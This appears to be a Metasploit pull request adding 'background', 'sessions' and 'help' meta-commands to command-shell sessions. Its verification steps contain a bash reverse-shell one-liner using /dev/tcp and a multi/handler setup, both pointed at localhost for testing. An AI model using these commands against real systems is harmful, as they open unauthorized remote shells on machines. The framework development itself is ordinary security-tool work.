### PR TITLE
[GSoC] Implementation of background/sessions meta command 

### DIFF
--- a/lib/msf/base/sessions/command_shell.rb
+++ b/lib/msf/base/sessions/command_shell.rb
@@ -109,7 +109,8 @@ class CommandShell
       'Prefix'  => "\n",
       'Postfix' => "\n",
       'Indent'  => 4,
-      'Columns' => columns
+      'Columns' => columns,
+      'SortIndex' => -1
     )
     commands.each { |key, value|
       tbl << [

--- a/lib/msf/base/sessions/command_shell.rb
+++ b/lib/msf/base/sessions/command_shell.rb
@@ -89,7 +89,6 @@ class CommandShell
   def run_cmd(cmd)
     arguments = parse_line(cmd)
     method    = arguments.shift
-    built_in_command_found = false
 
     # Built-in command
     if self.commands.has_key?(method)
@@ -107,8 +106,16 @@ class CommandShell
     print_line
   end
 
-  def cmd_background()
-    if (prompt_yesno("Background session #{name}?") == true)
+  def cmd_background(*args)
+    if !args.empty?
+      # We assume that background does not need arguments
+      # If user input does not follow this specification
+      # Then show help (Including '-h' '--help'...)
+      return cmd_background_help
+    end
+
+
+    if prompt_yesno("Background session #{name}?")
       self.interacting = false
     end
   end
@@ -117,15 +124,28 @@ class CommandShell
     print_line('Usage: sessions <id>')
     print_line
     print_line('Interact with a different session Id.')
+    print_line('This command only accept one positive numeric argument.')
     print_line('This works the same as calling this from the MSF shell: sessions -i <session id>')
     print_line
   end
 
   def cmd_sessions(*args)
-    if args.length.zero? || args[0].to_i.zero?
+    if args.length.zero? || args[0].to_i <= 0
       # No args
-      cmd_sessions_help
-    elsif args[0].to_s == self.name.to_s
+      return cmd_sessions_help
+    end
+
+    if args.length == 1 && (args[1] == '-h' || args[1] == 'help')
+      # One arg, and args[1] => '-h' '-H' 'help'
+      return cmd_sessions_help
+    end
+
+    if args.length != 1
+      # More than one argument
+      return cmd_sessions_help
+    end
+
+    if args[0].to_s == self.name.to_s
       # Src == Dst
       print_status("Session #{self.name} is already interactive.")
     else

--- a/lib/msf/base/sessions/command_shell.rb
+++ b/lib/msf/base/sessions/command_shell.rb
@@ -145,7 +145,7 @@ class CommandShell
     print_line('Usage: sessions <id>')
     print_line
     print_line('Interact with a different session Id.')
-    print_line('This command only accept one positive numeric argument.')
+    print_line('This command only accepts one positive numeric argument.')
     print_line('This works the same as calling this from the MSF shell: sessions -i <session id>')
     print_line
   end

--- a/lib/msf/base/sessions/command_shell.rb
+++ b/lib/msf/base/sessions/command_shell.rb
@@ -2,6 +2,8 @@
 require 'msf/base'
 require 'msf/base/sessions/scriptable'
 require 'shellwords'
+require 'rex/text/table'
+
 
 module Msf
 module Sessions
@@ -71,6 +73,7 @@ class CommandShell
   #
   def commands
     c = {
+        'help'            => 'Help menu',
         'background'   => 'Backgrounds the current shell session',
         'sessions'     => 'Quickly switch to another session',
     }
@@ -91,12 +94,29 @@ class CommandShell
     method    = arguments.shift
 
     # Built-in command
-    if self.commands.has_key?(method)
-      return self.run_command(method, arguments)
+    if commands.key?(method)
+      return run_command(method, arguments)
     end
 
     # User input is not a built-in command, write to socket directly
     shell_write(cmd)
+  end
+
+  def cmd_help(*args)
+    columns = ['Command', 'Description']
+    tbl = Rex::Text::Table.new(
+      'Header'  => 'Meta shell commands',
+      'Prefix'  => "\n",
+      'Postfix' => "\n",
+      'Indent'  => 4,
+      'Columns' => columns
+    )
+    commands.each { |key, value|
+      tbl << [
+        key, value
+      ]
+    }
+    print(tbl.to_s)
   end
 
   def cmd_background_help()
@@ -451,4 +471,3 @@ end
 
 end
 end
-

--- a/lib/msf/base/sessions/command_shell.rb
+++ b/lib/msf/base/sessions/command_shell.rb
@@ -88,7 +88,7 @@ class CommandShell
         # 'bgkill'       => 'Kills a background meterpreter script',
         # 'get_timeouts' => 'Get the current session timeout values',
         # 'set_timeouts' => 'Set the current session timeout values',
-        # 'sessions'     => 'Quickly switch to another session',
+        'sessions'     => 'Quickly switch to another session',
         # 'bglist'       => 'Lists running background scripts',
         # 'write'        => 'Writes data to a channel',
         # 'enable_unicode_encoding'  => 'Enables encoding of unicode strings',
@@ -123,11 +123,44 @@ class CommandShell
   end
 
 
+  def cmd_background_help()
+    print_line "Usage: background"
+    print_line
+    print_line "Stop interacting with this session and return to the parent prompt"
+    print_line
+  end
+
   def cmd_background()
     if (prompt_yesno("Background session #{name}?") == true)
       self.interacting = false
     end
   end
+
+  def cmd_sessions_help()
+    print_line('Usage: sessions <id>')
+    print_line
+    print_line('Interact with a different session Id.')
+    print_line('This works the same as calling this from the MSF shell: sessions -i <session id>')
+    print_line
+  end
+
+
+  def cmd_sessions(*args)
+    if args.length.zero? || args[0].to_i.zero?
+      # No args
+      cmd_sessions_help
+    elsif args[0].to_s == self.name.to_s
+      # Src == Dst
+      print_status("Session #{self.name} is already interactive.")
+    else
+      print_status("Backgrounding session #{self.name}...")
+      # store the next session id so that it can be referenced as soon
+      # as this session is no longer interacting
+      self.next_session = args[0]
+      self.interacting = false
+    end
+  end
+
 
   def run_command(method, arguments)
     # Dynamic function call

--- a/lib/msf/base/sessions/command_shell.rb
+++ b/lib/msf/base/sessions/command_shell.rb
@@ -397,7 +397,6 @@ protected
       sd = Rex::ThreadSafe.select([ _local_fd ], nil, [_local_fd], 5.0)
 
       # Write input to the ring's input mechanism
-      # shell_write(user_input.gets) if sd
       run_cmd(user_input.gets) if sd
     end
 

--- a/lib/msf/base/sessions/command_shell.rb
+++ b/lib/msf/base/sessions/command_shell.rb
@@ -65,11 +65,73 @@ class CommandShell
     "Command shell"
   end
 
+
+  def commands
+    c = {
+        # 'help'            => 'Help menu',
+        'background'   => 'Backgrounds the current shell session',
+        # 'close'        => 'Closes a channel',
+        # 'channel'      => 'Displays information or control active channels',
+        # 'exit'         => 'Terminate the meterpreter session',
+        # 'help'         => 'Help menu',
+        # 'irb'          => 'Drop into irb scripting mode',
+        # 'use'          => 'Deprecated alias for "load"',
+        # 'load'         => 'Load one or more meterpreter extensions',
+        # 'machine_id'   => 'Get the MSF ID of the machine attached to the session',
+        # 'guid'         => 'Get the session GUID',
+        # 'quit'         => 'Terminate the meterpreter session',
+        # 'resource'     => 'Run the commands stored in a file',
+        # 'uuid'         => 'Get the UUID for the current session',
+        # 'read'         => 'Reads data from a channel',
+        # 'run'          => 'Executes a meterpreter script or Post module',
+        # 'bgrun'        => 'Executes a meterpreter script as a background thread',
+        # 'bgkill'       => 'Kills a background meterpreter script',
+        # 'get_timeouts' => 'Get the current session timeout values',
+        # 'set_timeouts' => 'Set the current session timeout values',
+        # 'sessions'     => 'Quickly switch to another session',
+        # 'bglist'       => 'Lists running background scripts',
+        # 'write'        => 'Writes data to a channel',
+        # 'enable_unicode_encoding'  => 'Enables encoding of unicode strings',
+        # 'disable_unicode_encoding' => 'Disables encoding of unicode strings'
+    }
+
+  end
+
+  #
+  # Parse a line into an array of arguments.
+  #
+  def parse_line(line)
+    line.split(' ')
+  end
+
+
   #
   # Explicitly runs a command.
   #
   def run_cmd(cmd)
-    shell_command(cmd)
+    arguments = parse_line(cmd)
+    method    = arguments.shift
+    built_in_command_found = false
+
+    # Built-in command
+    if self.commands.has_key?(method)
+      return self.run_command(method, arguments)
+    end
+
+    # User input is not a built-in command, write to socket directly
+    shell_write(cmd)
+  end
+
+
+  def cmd_background()
+    if (prompt_yesno("Background session #{name}?") == true)
+      self.interacting = false
+    end
+  end
+
+  def run_command(method, arguments)
+    # Dynamic function call
+    self.send('cmd_' + method, *arguments)
   end
 
   #
@@ -324,7 +386,8 @@ protected
       sd = Rex::ThreadSafe.select([ _local_fd ], nil, [_local_fd], 5.0)
 
       # Write input to the ring's input mechanism
-      shell_write(user_input.gets) if sd
+      # shell_write(user_input.gets) if sd
+      run_cmd(user_input.gets) if sd
     end
 
     ensure

--- a/lib/msf/base/sessions/command_shell.rb
+++ b/lib/msf/base/sessions/command_shell.rb
@@ -66,35 +66,14 @@ class CommandShell
   end
 
 
+  #
+  # List of supported commands.
+  #
   def commands
     c = {
-        # 'help'            => 'Help menu',
         'background'   => 'Backgrounds the current shell session',
-        # 'close'        => 'Closes a channel',
-        # 'channel'      => 'Displays information or control active channels',
-        # 'exit'         => 'Terminate the meterpreter session',
-        # 'help'         => 'Help menu',
-        # 'irb'          => 'Drop into irb scripting mode',
-        # 'use'          => 'Deprecated alias for "load"',
-        # 'load'         => 'Load one or more meterpreter extensions',
-        # 'machine_id'   => 'Get the MSF ID of the machine attached to the session',
-        # 'guid'         => 'Get the session GUID',
-        # 'quit'         => 'Terminate the meterpreter session',
-        # 'resource'     => 'Run the commands stored in a file',
-        # 'uuid'         => 'Get the UUID for the current session',
-        # 'read'         => 'Reads data from a channel',
-        # 'run'          => 'Executes a meterpreter script or Post module',
-        # 'bgrun'        => 'Executes a meterpreter script as a background thread',
-        # 'bgkill'       => 'Kills a background meterpreter script',
-        # 'get_timeouts' => 'Get the current session timeout values',
-        # 'set_timeouts' => 'Set the current session timeout values',
         'sessions'     => 'Quickly switch to another session',
-        # 'bglist'       => 'Lists running background scripts',
-        # 'write'        => 'Writes data to a channel',
-        # 'enable_unicode_encoding'  => 'Enables encoding of unicode strings',
-        # 'disable_unicode_encoding' => 'Disables encoding of unicode strings'
     }
-
   end
 
   #
@@ -103,7 +82,6 @@ class CommandShell
   def parse_line(line)
     line.split(' ')
   end
-
 
   #
   # Explicitly runs a command.
@@ -121,7 +99,6 @@ class CommandShell
     # User input is not a built-in command, write to socket directly
     shell_write(cmd)
   end
-
 
   def cmd_background_help()
     print_line "Usage: background"
@@ -144,7 +121,6 @@ class CommandShell
     print_line
   end
 
-
   def cmd_sessions(*args)
     if args.length.zero? || args[0].to_i.zero?
       # No args
@@ -161,7 +137,9 @@ class CommandShell
     end
   end
 
-
+  #
+  # Run built-in command
+  #
   def run_command(method, arguments)
     # Dynamic function call
     self.send('cmd_' + method, *arguments)

--- a/lib/msf/base/sessions/command_shell.rb
+++ b/lib/msf/base/sessions/command_shell.rb
@@ -90,6 +90,9 @@ class CommandShell
   # Explicitly runs a command.
   #
   def run_cmd(cmd)
+    if cmd == nil
+      return
+    end
     arguments = parse_line(cmd)
     method    = arguments.shift
 

--- a/lib/msf/base/sessions/command_shell.rb
+++ b/lib/msf/base/sessions/command_shell.rb
@@ -72,8 +72,8 @@ class CommandShell
   # List of supported commands.
   #
   def commands
-    c = {
-        'help'            => 'Help menu',
+    {
+        'help'         =>  'Help menu',
         'background'   => 'Backgrounds the current shell session',
         'sessions'     => 'Quickly switch to another session',
     }
@@ -90,9 +90,9 @@ class CommandShell
   # Explicitly runs a command.
   #
   def run_cmd(cmd)
-    if cmd == nil
-      return
-    end
+    # Do nil check for cmd (CTRL+D will cause nil error)
+    return unless cmd
+
     arguments = parse_line(cmd)
     method    = arguments.shift
 
@@ -115,11 +115,9 @@ class CommandShell
       'Columns' => columns,
       'SortIndex' => -1
     )
-    commands.each { |key, value|
-      tbl << [
-        key, value
-      ]
-    }
+    commands.each do |key, value|
+      tbl << [key, value]
+    end
     print(tbl.to_s)
   end
 
@@ -137,7 +135,6 @@ class CommandShell
       # Then show help (Including '-h' '--help'...)
       return cmd_background_help
     end
-
 
     if prompt_yesno("Background session #{name}?")
       self.interacting = false


### PR DESCRIPTION
## Description
Implementation of `background` meta-command, allows to make reverse-shell session running background

## Issues 
> https://github.com/rapid7/metasploit-framework/issues/9714


## Problems
I implemented the `background` command just now... 
but the way I used is not elegant... I am not sure how can my code be suitable for the framework... 
could you guys please give me some suggestion about improve my directory structure?
I want try my best to make my code clean and beautiful... not only just works...
I think  `code style` or `Make my code better integrated into the framework, not just implement functionality` is important..
because I noticed that `Meterpreter session` used `lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:50` to implement the `meta shell commands`
![image](https://user-images.githubusercontent.com/16917636/40954491-64dd0d74-68b7-11e8-9086-b5811c4a1bd0.png)

## Verification

List the steps needed to make sure this thing works

> Attacker side
- [x] `msfconsole`
- [x] `use multi/handler;`
- [x] `set payload cmd/unix/reverse_bash;`
- [x] `set ExitOnSessions False;`
- [x] `set LHOST 127.0.0.1;`
- [x] `set LPORT 4444;`
- [x] `exploit`

> Victim side
- [x] `bash -c 'bash -i >&/dev/tcp/127.0.0.1/4444 2>&1 0>1&'`
- [x] `bash -c 'bash -i >&/dev/tcp/127.0.0.1/4444 2>&1 0>1&'`
- [x] `bash -c 'bash -i >&/dev/tcp/127.0.0.1/4444 2>&1 0>1&'`

- [x] **Verify** On the attacker side, we should get a revese shell
- [x] **Verify** Type `background`, it appears `Background session 1? [y/N]  y`, type `y`, then this session go background
- [x] **Verify** Type `sessions`, it appears `Usage: sessions <id> .... from the MSF shell: sessions -i <session id>` (Help doc of `sessions` command)
- [x] **Verify** Type `sessions 3`, now the current session is switched to session 3


#### Update
- [x] **Verify**  Handle parameters to the background command. Currently, I get a backtrace Session manipulation failed: wrong number of arguments (given 1, expected 0) when I try background -h.
- [x] **Verify**   Support -h for the background and sessions command. (Actually every input which is not followed the specification will jump to the `cmd_#{method}_help` function)
- [x] **Verify**   Consider adding a help command so the user can see the list of commands (currently just sessions and background, but that might expand).